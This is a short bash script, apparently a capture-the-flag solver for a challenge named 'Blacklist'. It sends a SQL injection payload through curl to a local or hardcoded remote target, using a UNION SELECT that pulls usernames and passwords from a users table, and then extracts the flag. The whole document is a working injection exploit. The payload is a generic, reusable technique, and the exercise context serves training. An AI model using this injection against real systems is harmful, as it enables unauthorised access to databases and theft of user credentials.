#!/bin/bash
PORT=13000

if [[ $1 == "local" ]]
then
    remote='http://127.0.0.1:'$PORT
elif [[ $1 == "remote" ]] && [[ -z $2 ]] 
then
    remote='http://141.85.224.118:'$PORT
else
    remote=$1':'$2
fi

# Blacklist
echo "Start exploit for Blacklist"
flag=$(curl -s -G --data-urlencode 'q=and 0 union select 1,username,password from users #\' $remote | grep -m 1 -o "SSS{.*}")
echo "Flag is $flag"
echo "----------------------------"
